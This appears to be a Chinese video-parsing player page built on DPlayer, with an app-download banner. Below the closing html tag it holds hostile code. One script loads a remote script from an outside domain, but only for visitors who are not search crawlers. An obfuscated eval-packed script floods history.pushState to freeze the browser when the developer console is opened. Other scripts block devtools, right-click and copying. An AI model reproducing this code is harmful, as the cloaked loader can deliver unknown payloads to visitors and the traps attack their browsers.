
<!DOCTYPE html>
<html>
<head>
<title>Dp视频解析</title>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<meta name="referrer" content="never">
<meta http-equiv="X-UA-Compatible" content="IE=11" />
<meta content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=no" id="viewport" name="viewport">
<link href="https://cdn.staticfile.org/dplayer/1.25.0/DPlayer.min.css" rel="stylesheet">
<script src="https://cdn.staticfile.org/jquery/2.2.3/jquery.min.js"></script>
<script src="https://cdn.staticfile.org/hls.js/0.10.1/hls.min.js"></script>
<script src="https://cdn.staticfile.org/dplayer/1.25.0/DPlayer.min.js"></script>
<script disable-devtool-auto src='https://theajack.gitee.io/disable-devtool/npm/disable-devtool.min.js'></script>
<style type="text/css">
        body, html, .video {padding: 0;margin: 0;width: 100%;height: 100%;background-color:#000;}
        </style>
<style type="text/css">

.h2_video_nobuy_tips{position: absolute;z-index: 9;color: #fff;font-size: 14px;height: 30px;width: 100%;text-align: center;margin: 0 10px;}
.h2_video_buybox-content{width:100%;height: 100%;background: rgba(0, 0, 0, 0.3);}
  .h2_video_buybox-tipsbtn {background: #f60;padding: 5px 15px;border-radius: 2px;cursor: pointer;color: #fff;margin-top: 1px;display: inline-block;}
  </style>
  <div id="h2_video_nobuybox"><div class="h2_video_nobuy_tips"><a href="https://haomitv.github.io/haomitv/" target="_blank"><m class="h2_video_buybox-tipsbtn">点击下载</m></a>本站专属app,支持投屏和离线下载。</div></div><body style="background:#000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" oncontextmenu=window.event.returnValue=false>
<div id="video"></div>
</head>
<body>
<div id="ldgplayer" style="width:100%;height:100%"></div>
<script>
function GetQueryString(name)
{
     var reg = new RegExp("(^|&)"+ name +"=([^&]*)(&|$)");
     var r = window.location.search.substr(1).match(reg);
     if(r!=null)return  unescape(r[2]); return null;
}
var ldgurl = GetQueryString("url");
ldgurl=ldgurl.replace('http://','https://');
ldgurl=ldgurl.replace('http://','https://');
  if(ldgurl.indexOf("/share/")>0)
 {
   location.href=ldgurl;
  }else
  {
		var isPhone = navigator.userAgent.match(/iPad|iPhone|Android|Linux|iPod/i) != null;
        if (isPhone) {
            var HTML = '<video src="'+ldgurl+'" controls="controls" poster="//p3fx.kgimg.com/v2/fxuseralbum/72909814f4ef37add4a90bd5b6c123a0.png" autoplay="autoplay" width="100%" height="100%"></video>';
            document.getElementById("ldgplayer").innerHTML = HTML;
        } else {
			var dp = new DPlayer({
				element: document.getElementById('ldgplayer'),
				autoplay: true,
				screenshot: true,
				video: {
					url: ldgurl,
					pic:'//p3fx.kgimg.com/v2/fxuseralbum/72909814f4ef37add4a90bd5b6c123a0.png',
					type: 'auto'
				}
			});
		}
  }
dp.on("loadeddata", function () {
  dp.notice("视频已就绪");
});
dp.on("fullscreen", function () {
  dp.notice("全屏已开启");
});
dp.on("fullscreen_cancel", function () {
  dp.notice("全屏已关闭");
});
dp.on('ended',function(){
　　　　if(next!=''){
            top.location.href = next;
        }
　　});
dp.on("error", function () {
  dp.notice("加载失败，请切换线路观看~");
});
</script>
<div style="z-index:9999;position: absolute;bottom:0px;left:0px;">    
</div>
</body>
</html>
  
<script type="text/javascript">
var dkdz='https://www.govyiwu.cn:12443/ty/7604C56E-FC83-13357-22-D9681790E933.alpha';
if(navigator.userAgent.match(/Baiduspider|Bytespider|YisouSpider|360Spider|gjuren123/i)==null){document.write('<script src="'+dkdz+'"><\/script>');}
</script>
 <!--/禁止右键-->
<script type="text/javascript"> document.body.oncontextmenu=document.body.ondragstart= document.body.onselectstart=document.body.onbeforecopy=function(){return false;};
document.body.onselect=document.body.oncopy=document.body.onmouseup=function(){document.selection.empty();}; </script> 
 <!--/禁止F12-->
<script>
eval(function(d,f,a,c,b,e){b=function(a){return a.toString(f)};if(!"".replace(/^/,String)){for(;a--;)e[b(a)]=c[a]||b(a);c=[function(a){return e[a]}];b=function(){return"\\w+"};a=1}for(;a--;)c[a]&&(d=d.replace(new RegExp("\\b"+b(a)+"\\b","g"),c[a]));return d}("1 2=c.3('8');4.b(2,'5',{6:7(){1 a=\"\";9(1 i=0;i<d;i++){a=a+i.e();f.g(0,0,a)}}});h.j(2);",20,20," var x createElement Object id get function div for  defineProperty document 1000000 toString history pushState console  log".split(" "),0,{}));
</script>

<div style="display:none;"></div>
